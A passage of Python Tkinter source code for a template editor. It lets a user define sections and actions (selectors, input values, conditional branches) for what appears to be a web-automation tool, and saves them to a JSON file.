self.treev1.insert(\"\", 'end',values =(sectionName, sectionType,sectionCategory,actionCount))\n self.var_allSectionName.append(sectionName)\n elif(procType==2):\n self.varCurrentSection=None \n self.clear_all_gridview(procType) \n if(not self.checkKey(self.varCurrentTemplate,\"sections\")): \n return\n for sections in self.varCurrentTemplate[\"sections\"]: \n if sections[\"sectionName\"]==self.var_sectionName.get():\n self.varCurrentSection=sections\n if(self.varCurrentSection != None):\n if( self.checkKey(self.varCurrentSection,\"sectionCategory\")) :\n self.var_sectionCategory.set(self.varCurrentSection[\"sectionCategory\"])\n if( self.checkKey(self.varCurrentSection,\"sectionType\")) :\n self.var_sectionType.set(self.varCurrentSection[\"sectionType\"])\n for actions in self.varCurrentSection[\"actions\"]: \n 
ActionId,ActionType,StartupType,SelectorType,Control_,InputType,ManualValue,IOValue,NextActionId='','','','','','','','',''\n conditionType,leftInputType,leftManualValue,leftIOValue,trueActionId,rightInputType,rightManualValue,rightIOValue,falseActionId='','','','','','','','',''\n if(self.checkKey(actions,\"actionId\")):\n ActionId=actions[\"actionId\"]\n if(self.checkKey(actions,\"actionType\")):\n ActionType=actions[\"actionType\"]\n if(self.checkKey(actions,\"startupType\")):\n StartupType=actions[\"startupType\"]\n if(self.checkKey(actions,\"selectorType\")):\n SelectorType=actions[\"selectorType\"]\n if(self.checkKey(actions,\"control\")):\n Control_=actions[\"control\"]\n if(self.checkKey(actions,\"inputType\")):\n InputType=actions[\"inputType\"]\n if(self.checkKey(actions,\"manualValue\")):\n ManualValue=actions[\"manualValue\"]\n if(self.checkKey(actions,\"ioValue\")):\n IOValue=actions[\"ioValue\"]\n if(self.checkKey(actions,\"nextActionId\")):\n NextActionId=actions[\"nextActionId\"]\n\n if(self.checkKey(actions,\"conditionType\")):\n conditionType=actions[\"conditionType\"]\n if(self.checkKey(actions,\"leftInputType\")):\n leftInputType=actions[\"leftInputType\"]\n if(self.checkKey(actions,\"leftManualValue\")):\n leftManualValue=actions[\"leftManualValue\"]\n if(self.checkKey(actions,\"leftIOValue\")):\n leftIOValue=actions[\"leftIOValue\"]\n if(self.checkKey(actions,\"trueActionId\")):\n trueActionId=actions[\"trueActionId\"]\n if(self.checkKey(actions,\"rightInputType\")):\n rightInputType=actions[\"rightInputType\"]\n if(self.checkKey(actions,\"rightManualValue\")):\n rightManualValue=actions[\"rightManualValue\"]\n if(self.checkKey(actions,\"rightIOValue\")):\n rightIOValue=actions[\"rightIOValue\"]\n if(self.checkKey(actions,\"falseActionId\")):\n falseActionId=actions[\"falseActionId\"]\n\n \n self.treev2.insert(\"\", 'end',values =(ActionId,ActionType,StartupType,SelectorType,Control_,InputType,ManualValue,IOValue,NextActionId,\n conditionType,leftInputType,leftManualValue,leftIOValue,trueActionId,rightInputType,rightManualValue,rightIOValue,falseActionId))\n self.treev2.pack_forget()\n self.treev2.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n \n def BindSectionType(self,event):\n self.var_sectionType.set(self.GetSectiontype(self.var_sectionCategory.get())) \n \n def GetSectiontype(self,selctionName):\n for i ,x in enumerate(self.var_allSectionCategory):\n if(x==selctionName):\n return self.var_allSectionCategoryType[i]\n\n def clear_all_gridview(self,ProcType=1):\n if(ProcType==1):\n for item in self.treev1.get_children():\n self.treev1.delete(item)\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n elif(ProcType==2) :\n for item in self.treev2.get_children():\n self.treev2.delete(item) \n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n\n\n def 
fncCreateItems(self):\n self.varActionType.set(\"Add Template\")\n self.frmHeader = ttk.Frame(self.ContainerFrame) \n frmBody = ttk.Frame(self.ContainerFrame)\n self.ContainerFrame.grid_columnconfigure(0, weight=100)\n self.ContainerFrame.grid_rowconfigure(0, weight=1)\n self.ContainerFrame.grid_rowconfigure(1, weight=100)\n\n self.frmHeader.grid(row=0,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n frmBody.grid(row=1,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n\n self.frmHeader.columnconfigure(0, weight=1)\n self.frmHeader.columnconfigure(1, weight=1)\n self.frmHeader.columnconfigure(2, weight=1)\n self.frmHeader.columnconfigure(3, weight=100)\n self.frmHeader.rowconfigure(0, weight=1)\n self.frmHeader.rowconfigure(1, weight=1)\n self.frmHeader.rowconfigure(2, weight=1)\n self.frmHeader.rowconfigure(3, weight=100)\n\n ttk.Label(self.frmHeader,text = \"Type\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbType=ttk.Combobox(self.frmHeader,state=\"readonly\", width = 24, textvariable = self.varActionType, values=(\"Add Template\",\"Update Template\"))\n \n cmbType.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n\n ttk.Label(self.frmHeader,text = \"Template Name\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbAllTemplate=ttk.Combobox(self.frmHeader,name=\"cmbTemplateName\",state=\"readonly\", width = 24, textvariable = self.varCurrentTemplateName)\n ttk.Entry(self.frmHeader,name=\"txtTemplateName\",width = 26,textvariable = self.varCurrentTemplateName).grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n ttk.Label(self.frmHeader,text = \"Url\" ,font=self.displayFont).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.frmHeader,name=\"txtUrl\",textvariable =self.varCurrentUrl, width = 26).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n\n \n frmbtn = ttk.Frame(self.frmHeader) \n frmbtn.grid(row=0,column = 2, rowspan=3, sticky=tk.N+tk.S+tk.W)\n btnSave = ttk.Button( frmbtn, text =\"Save\", width=10,command =lambda: self.fncSaveData())\n btnReset = ttk.Button ( frmbtn, text =\"Reset\", width=10,command =lambda: self.fncResetData())\n \n btnSave.grid(row=0,column = 0 , padx=(10,0),pady=(3,5)) \n btnReset.grid(row=1,column = 0, padx=(10,0),pady=(3,5))\n\n\n frmbtn1 = ttk.Frame(self.frmHeader,name=\"frmTreeviewhandler\") \n frmbtn1.grid(row=3,column = 1, columnspan=3, sticky=tk.N+tk.W+tk.E)\n btnAddAction = ttk.Button ( frmbtn1,name=\"btnAddAction\" , image=self.config.ico_add ,command =lambda: self.fncOpenChildForm(False) ) \n btnEditAction = ttk.Button ( frmbtn1,name=\"btnEditAction\" , image=self.config.ico_edit , state=tk.DISABLED, command =lambda: self.fncOpenChildForm(True) ) \n btnRemoveAction = ttk.Button ( frmbtn1,name=\"btnRemoveAction\",image=self.config.ico_delete , state=tk.DISABLED,command =lambda: self.fncRemove() )\n btnMoveUpAction = ttk.Button ( frmbtn1,name=\"btnMoveUpAction\",image=self.config.ico_up , state=tk.DISABLED,command =lambda: self.fncMoveUp() )\n btnMoveDownAction = ttk.Button ( frmbtn1,name=\"btnMoveDownAction\",image=self.config.ico_down , state=tk.DISABLED,command =lambda: self.fncMoveDown() )\n btnAddAction.grid(row=0,column = 0, padx=(10,0),pady=(3,5))\n btnEditAction.grid(row=0,column = 1, padx=(10,0),pady=(3,5))\n btnRemoveAction.grid(row=0,column =2, padx=(10,0),pady=(3,5))\n btnMoveUpAction.grid(row=0,column =3, padx=(10,0),pady=(3,5))\n btnMoveDownAction.grid(row=0,column =4, 
padx=(10,0),pady=(3,5))\n\n        self.treev1 = ttk.Treeview(frmBody, selectmode='browse')\n        # Vertical and horizontal scrollbars attached to the treeview\n        verscrlbar = ttk.Scrollbar(frmBody,orient=\"vertical\",command=self.treev1.yview)\n        horscrlbar = ttk.Scrollbar(frmBody,orient=\"horizontal\",command=self.treev1.xview)\n\n        verscrlbar.pack(side='right', fill='y')\n        horscrlbar.pack(side='bottom', fill='x')\n        self.treev1.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n        self.treev1.configure(xscrollcommand=horscrlbar.set, yscrollcommand=verscrlbar.set)\n\n        # Define the columns and show headings only\n        self.treev1[\"columns\"] = (\"sectionName\", \"sectionType\", \"sectionCategory\",\"actionCount\")\n        self.treev1['show'] = 'headings'\n        # Assign the width and anchor of the respective columns\n        self.treev1.column(\"sectionName\", width=50, anchor='nw')\n        self.treev1.column(\"sectionType\", width=50, anchor='nw')\n        self.treev1.column(\"sectionCategory\", width=50, anchor='nw')\n        self.treev1.column(\"actionCount\", width=50, anchor='center')\n\n        # Assign the heading names of the respective columns\n        self.treev1.heading(\"sectionName\", text=\"Section Name\")\n        self.treev1.heading(\"sectionType\", text=\"Type\")\n        self.treev1.heading(\"sectionCategory\", text=\"Category\")\n        self.treev1.heading(\"actionCount\", text=\"Action Count\")\n\n        self.treev1.bind(\"<ButtonRelease-1>\",lambda event:self.fncMoveItems(event,1))\n        cmbType.bind(\"<<ComboboxSelected>>\", lambda event:self.fncChangeTemplateType(event))\n        cmbAllTemplate.bind(\"<<ComboboxSelected>>\",lambda event:self.BindExistingTreeview(event,1))\n\n    def fnc_Select_Record(self,procType):\n        if(procType==1):\n            selected=self.treev1.focus()\n            if(len(selected)>0):\n                self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.NORMAL\n        elif (procType==2):\n            selected=self.treev2.focus()\n            if(len(selected)>0):\n                self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.NORMAL\n                self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.NORMAL\n\n    def fncMoveItems(self,e,procType=1):\n        self.fnc_Select_Record(procType)\n\n    def fncMoveUp(self,procType=1):\n        if(procType==1):\n            rows=self.treev1.selection()\n            for row in rows:\n                self.treev1.move(row,self.treev1.parent(row),self.treev1.index(row)-1)\n        elif(procType==2):\n            rows=self.treev2.selection()\n            for row in rows:\n                self.treev2.move(row,self.treev2.parent(row),self.treev2.index(row)-1)\n\n    def fncMoveDown(self,procType=1):\n        if(procType==1):\n            rows=self.treev1.selection()\n            for row in reversed(rows):\n                self.treev1.move(row,self.treev1.parent(row),self.treev1.index(row)+1)\n        elif(procType==2):\n            rows=self.treev2.selection()\n            for row in reversed(rows):\n                self.treev2.move(row,self.treev2.parent(row),self.treev2.index(row)+1)\n\n    def fncRemove(self,ProcType=1):\n        if(ProcType==1):\n            selected_items = self.treev1.selection()\n
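            # Warn and bail out when nothing is selected; otherwise delete the chosen rows.\n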
            if(len(selected_items)==0):\n                tk.messagebox.showerror(\"Error\", \"Select the section\")\n                return\n            for selected_item in selected_items:\n                self.treev1.delete(selected_item)\n            self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader.children[\"frmTreeviewhandler\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n        if(ProcType==2):\n            selected_items = self.treev2.selection()\n            if(len(selected_items)==0):\n                tk.messagebox.showerror(\"Error\", \"Select the section\")\n                return\n            for selected_item in selected_items:\n                self.treev2.delete(selected_item)\n            self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnRemoveAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnEditAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveUpAction\"][\"state\"]=tk.DISABLED\n            self.frmHeader1.children[\"frmTreeviewhandler1\"].children[\"btnMoveDownAction\"][\"state\"]=tk.DISABLED\n\n    def fncResetData(self):\n        self.varActionType.set(\"Add Template\")\n        self.varCurrentTemplateName.set(\"\")\n        self.varCurrentUrl.set(\"\")\n        self.clear_all_gridview()\n        self.fncChangeTemplateType(None)\n        self.BindDropDownTemplateName()\n\n    def fncSaveData(self,ProcType=1):\n        # Exact name match; a substring test would wrongly flag similar template names.\n        template_exists = any(elem[\"templateName\"] == self.varCurrentTemplateName.get() for elem in self.varAllTemlate)\n        tempSection=None\n        self.varAllSection=[]\n\n        if(self.varActionType.get()==\"Add Template\"):\n            if template_exists:\n                messagebox.showerror(\"Already Exists\", \"Template Name already exists\")\n                return\n        if(self.varActionType.get()==\"Update Template\"):\n            if not template_exists:\n                messagebox.showerror(\"Not Exists\", \"Invalid template name\")\n                return\n            self.varAllSection=self.varCurrentTemplate[\"sections\"]\n        if(self.varCurrentUrl==None or self.varCurrentUrl.get()==\"\"):\n            messagebox.showerror(\"Required\", \"Required URL\")\n            return\n\n        if(ProcType==2):\n            FoundSection=False\n            if(self.var_sectionName==None or self.var_sectionName.get()==\"\"):\n                messagebox.showerror(\"Required\", \"Required Section Name\")\n                return\n            for sections in self.varAllSection:\n                if(self.checkKey(sections,\"sectionName\")):\n                    if(sections[\"sectionName\"]==self.var_sectionName.get()):\n                        FoundSection=True\n                        break\n            if(self.IsUpdateSection and not FoundSection):\n                messagebox.showerror(\"Required\", \"Invalid Section Name\")\n                return\n            if(not self.IsUpdateSection and FoundSection):\n                messagebox.showerror(\"Required\", \"Section Name already exists\")\n                return\n            if(self.var_sectionType==None or self.var_sectionType.get()==\"\"):\n                messagebox.showerror(\"Required\", \"Required Section Type\")\n                return\n            if(self.var_sectionCategory==None or self.var_sectionCategory.get()==\"\"):\n                messagebox.showerror(\"Required\", \"Required Section Category\")\n                return\n            if(self.treev2==None):\n                messagebox.showerror(\"Required\", \"Required Actions\")\n                return\n            # The treeview column ids match the JSON keys, so each row can be zipped\n            # straight into its action dict.\n            AllAction=[]\n            columns=self.treev2[\"columns\"]\n            for item in self.treev2.get_children():\n                values=self.treev2.item(item)[\"values\"]\n                AllAction.append({col:str(val) for col,val in zip(columns,values)})\n            if(len(AllAction)==0):\n                messagebox.showerror(\"Required\", \"Required Actions\")\n                return\n            tempSection={\"sectionName\":str(self.var_sectionName.get()),\"sectionCategory\":str(self.var_sectionCategory.get()),\n                         \"sectionType\":str(self.var_sectionType.get()),\"actions\":AllAction}\n\n            if(self.IsUpdateSection):\n                for index,sections in enumerate(self.varAllSection):\n                    if(self.checkKey(sections,\"sectionName\")):\n                        if(sections[\"sectionName\"]==self.var_sectionName.get()):\n                            self.varAllSection[index]=tempSection\n            else:\n                if(self.varAllSection==None):\n                    self.varAllSection=[]\n                self.varAllSection.append(tempSection)\n                # add the new section to the treeview\n                self.treev1.insert(\"\", 'end',values =(self.var_sectionName.get(), str(self.var_sectionType.get()),str(self.var_sectionCategory.get()),len(AllAction)))\n        if(len(self.varAllSection)==0):\n            messagebox.showerror(\"Required\", \"Required Section\")\n            return\n\n        AllData=None\n        if(self.varActionType.get()==\"Add Template\"):\n            AllData={\"templateName\":str(self.varCurrentTemplateName.get()),\"url\":str(self.varCurrentUrl.get()),\"sections\":self.varAllSection}\n            self.varAllTemlate.append(AllData)\n        elif (self.varActionType.get()==\"Update Template\"):\n            # Preserve the on-screen ordering of sections when updating.\n            AllSection=[]\n            for titem in self.treev1.get_children():\n                for vitem in self.varAllSection:\n                    if(self.treev1.item(titem)[\"values\"][0]==vitem[\"sectionName\"]):\n                        AllSection.append(vitem)\n            AllData={\"templateName\":str(self.varCurrentTemplateName.get()),\"url\":str(self.varCurrentUrl.get()),\"sections\":AllSection}\n            for i, item in enumerate(self.varAllTemlate):\n                if item[\"templateName\"] == self.varCurrentTemplateName.get():\n                    self.varAllTemlate[i] = AllData\n\n        with open(os.path.join(self.config.FilePath, self.config.TemplateFileName), 'w', encoding='utf-8') as f:\n            json.dump(self.varAllTemlate, f, ensure_ascii=False, indent=4,separators=(',',': '))\n        tk.messagebox.showinfo(\"Saved\", \"Saved successfully\")\n        if(ProcType==2):\n            if(self.checkKey(self.frmHeader1.children,\"cmbSectionName\")):\n                self.frmHeader1.children[\"cmbSectionName\"].focus_set()\n            if(self.checkKey(self.frmHeader1.children,\"txtSectionName\")):\n                self.frmHeader1.children[\"txtSectionName\"].focus_set()\n\n    def fncOpenChildForm(self,IsUpdate):\n        if(IsUpdate):\n            selected_items = self.treev1.selection()\n            if(selected_items==None or len(selected_items)==0):\n                tk.messagebox.showerror(\"Error\", \"Select the section\")\n                self.IsUpdateSection=False\n                return\n            else:\n                for x in selected_items:\n                    self.var_sectionName.set(self.treev1.item(x)[\"values\"][0])\n                self.IsUpdateSection=True\n        else:\n            self.varCurrentSection=None\n            
self.IsUpdateSection=False\n containter = tk.Toplevel(self.ContainerFrame,name=\"frmChildForm\") \n if(IsUpdate):\n containter.title(\"Update Section\")\n else:\n containter.title(\"Add Section\")\n containter.geometry(\"600x400\")\n innercontainter=ttk.Frame(containter)\n innercontainter.pack(expand=tk.TRUE,fill=tk.BOTH)\n innercontainter.columnconfigure(0, weight=1)\n innercontainter.rowconfigure(0, weight=1)\n innercontainter.rowconfigure(1, weight=100)\n\n self.frmHeader1=ttk.Frame(innercontainter)\n self.frmHeader1.grid(row=0,column=0)\n self.frmHeader1.columnconfigure(0, weight=1)\n self.frmHeader1.columnconfigure(1, weight=1)\n self.frmHeader1.columnconfigure(2, weight=100)\n self.frmHeader1.rowconfigure(0, weight=1)\n self.frmHeader1.rowconfigure(1, weight=1)\n self.frmHeader1.rowconfigure(2, weight=1)\n self.frmHeader1.rowconfigure(3, weight=1)\n self.frmHeader1.rowconfigure(4, weight=1)\n \n cmbSectionName=None\n ttk.Label(self.frmHeader1,text = \"Section Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(20, 2), sticky=tk.N+tk.S+tk.E) \n if(IsUpdate):\n cmbSectionName=ttk.Combobox(self.frmHeader1, name=\"cmbSectionName\", width = 24,state=\"readonly\" , textvariable = self.var_sectionName, values=self.var_allSectionName)\n cmbSectionName.grid(row=0,column = 1,padx=(10, 10), pady=(20, 2))\n else:\n ttk.Entry(self.frmHeader1, width = 26, name=\"txtSectionName\", textvariable = self.var_sectionName).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2)) \n\n ttk.Label(self.frmHeader1,text = \"Section Category :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbSectionCategory=ttk.Combobox(self.frmHeader1, width = 24,state=\"readonly\", textvariable = self.var_sectionCategory, values=self.var_allSectionCategory)\n cmbSectionCategory.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2))\n\n ttk.Label(self.frmHeader1,text = \"Section Type :\").grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n ttk.Entry(self.frmHeader1, width = 26,state=\"readonly\", textvariable = self.var_sectionType).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2))\n \n \n\n ttk.Button(self.frmHeader1, text =\"Save\", width=10, command =lambda: self.fncSaveData(2)).grid(row=5,column = 1 , padx=(10,0),pady=(3,5),sticky=tk.N+tk.W)\n\n frmbtn1 = ttk.Frame(self.frmHeader1,name=\"frmTreeviewhandler1\")\n frmbtn1.grid(row=3,column = 1, columnspan=4, sticky=tk.N+tk.W+tk.E)\n btnAddAction = ttk.Button ( frmbtn1,name=\"btnAddAction\" , image=self.config.ico_add ,command =lambda: self.fncAddInnerChildForm() ) \n btnEditAction = ttk.Button ( frmbtn1,name=\"btnEditAction\" , image=self.config.ico_edit ,command =lambda: self.fncUpdateInnerChildForm() ) \n btnRemoveAction = ttk.Button ( frmbtn1,name=\"btnRemoveAction\", image=self.config.ico_delete, state=tk.DISABLED, command =lambda: self.fncRemove(2) )\n btnMoveUpAction = ttk.Button ( frmbtn1,name=\"btnMoveUpAction\", image=self.config.ico_up, state=tk.DISABLED, command =lambda: self.fncMoveUp(2) )\n btnMoveDownAction = ttk.Button ( frmbtn1,name=\"btnMoveDownAction\", image=self.config.ico_down,state=tk.DISABLED, command =lambda: self.fncMoveDown(2) )\n btnAddAction.grid(row=0,column = 0, padx=(10,0),pady=(3,5))\n btnEditAction.grid(row=0,column = 1, padx=(10,0),pady=(3,5))\n btnRemoveAction.grid(row=0,column =2, padx=(10,0),pady=(3,5))\n btnMoveUpAction.grid(row=0,column =3, padx=(10,0),pady=(3,5))\n btnMoveDownAction.grid(row=0,column =4, padx=(10,0),pady=(3,5))\n\n frmBody=ttk.Frame(innercontainter)\n 
frmBody.grid(row=1,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n self.treev2 = ttk.Treeview(frmBody, selectmode ='browse')\n # Constructing vertical scrollbar\n # with treeview\n verscrlbar = ttk.Scrollbar(frmBody,orient =\"vertical\",command = self.treev2.yview)\n horscrlbar = ttk.Scrollbar(frmBody,orient =\"horizontal\",command = self.treev2.xview)\n\n # Calling pack method w.r.to vertical\n # scrollbar\n verscrlbar.pack(side ='right', fill ='y')\n horscrlbar.pack(side ='bottom', fill ='x')\n self.treev2.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n # Configuring treeview\n self.treev2.configure(xscrollcommand = horscrlbar.set, yscrollcommand=verscrlbar.set)\n\n # Defining number of columns\n self.treev2[\"columns\"] = (\"actionId\", \"actionType\", \"startupType\",\"selectorType\",\"control\",\"inputType\",\"manualValue\",\"ioValue\",\"nextActionId\",\n \"conditionType\",\"leftInputType\",\"leftManualValue\",\"leftIOValue\",\"trueActionId\",\n \"rightInputType\",\"rightManualValue\",\"rightIOValue\",\"falseActionId\")\n # Defining heading\n self.treev2['show'] = 'headings'\n # Assigning the width and anchor to the\n # respective columns\n self.treev2.column(\"actionId\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"actionType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"startupType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"selectorType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"control\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"inputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"manualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"ioValue\", stretch=tk.NO, width = 150, anchor ='nw')\n self.treev2.column(\"nextActionId\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"conditionType\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"leftInputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"leftManualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"leftIOValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"trueActionId\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightInputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightManualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightIOValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"falseActionId\", stretch=tk.NO, width = 50, anchor ='nw')\n \n # Assigning the heading names to the\n # respective columns\n self.treev2.heading(\"actionId\", text =\"Id\")\n self.treev2.heading(\"actionType\", text =\"Action Type\")\n self.treev2.heading(\"startupType\", text =\"Startup Type\")\n self.treev2.heading(\"selectorType\", text =\"Selector Type\")\n self.treev2.heading(\"control\", text =\"Control\")\n self.treev2.heading(\"inputType\", text =\"Input Type\")\n self.treev2.heading(\"manualValue\", text =\"manualValue\")\n self.treev2.heading(\"ioValue\", text =\"IO Value\")\n self.treev2.heading(\"nextActionId\", text =\"Next Action\") \n\n self.treev2.heading(\"conditionType\", text =\"Condition Type\") \n self.treev2.heading(\"leftInputType\", text =\"Left Input Type\") \n self.treev2.heading(\"rightInputType\", text =\"Right Input Type\") \n self.treev2.heading(\"leftManualValue\", text =\"Left Manual Value\") \n self.treev2.heading(\"rightManualValue\", text =\"Right Manual Value\") 
\n self.treev2.heading(\"leftIOValue\", text =\"left IO Value\") \n self.treev2.heading(\"rightIOValue\", text =\"right IO Value\") \n self.treev2.heading(\"trueActionId\", text =\"True Action Id\") \n self.treev2.heading(\"falseActionId\", text =\"False Action Id\") \n\n self.treev2.bind(\"\", lambda event: self.fncMoveItems(event,2))\n if(cmbSectionName!=None):\n self.BindExistingTreeview(None,2)\n cmbSectionName.bind(\"<>\", lambda event: self.BindExistingTreeview(event,2))\n if(cmbSectionCategory!=None):\n self.BindSectionType(None)\n cmbSectionCategory.bind(\"<>\", lambda event: self.BindSectionType(event))\n containter.grab_set()\n \n def fncChangeActionType(self,event):\n if(self.var_actionType.get()==\"Condition\" or self.var_actionType.get()==\"Find Index\"):\n if(self.chdFrm1 != None):\n self.chdFrm1.grid_forget()\n if(self.chdFrm2 != None):\n self.chdFrm2.grid(row=3,column=0,columnspan=4)\n else:\n if(self.chdFrm2 != None):\n self.chdFrm2.grid_forget()\n if(self.chdFrm1 != None):\n self.chdFrm1.grid(row=2,column=0,columnspan=4)\n \n def fncChangeInputType(self,event,ProcType=1):\n if(ProcType==1):\n if(self.var_inputType.get()==\"ManualValue\"):\n (self.chdFrm1.children[\"lblManualValue\"]).grid(row=1,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n (self.chdFrm1.children[\"txtManualValue\"]).grid(row=1,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid_forget()\n elif(self.var_inputType.get()==\"IOValue\"):\n (self.chdFrm1.children[\"lblManualValue\"]).grid_forget()\n (self.chdFrm1.children[\"txtManualValue\"]).grid_forget()\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid(row=2,column = 0,padx=(10, 10), pady=(0, 0), columnspan=4,sticky=tk.N+tk.W) \n else:\n self.var_inputType.set(\"ManualValue\")\n (self.chdFrm1.children[\"lblManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n (self.chdFrm1.children[\"txtManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid_forget()\n elif(ProcType==2):\n if(self.var_leftInputType.get()==\"ManualValue\"):\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid_forget()\n elif(self.var_leftInputType.get()==\"IOValue\"):\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid(row=2,column = 0,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n else:\n self.var_leftInputType.set(\"ManualValue\")\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid_forget()\n elif(ProcType==3):\n if(self.var_rightInputType.get()==\"ManualValue\"):\n (self.chdFrm2.children[\"lblRightManualValue\"]).grid(row=2,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid(row=2,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid_forget()\n elif(self.var_rightInputType.get()==\"IOValue\"):\n 
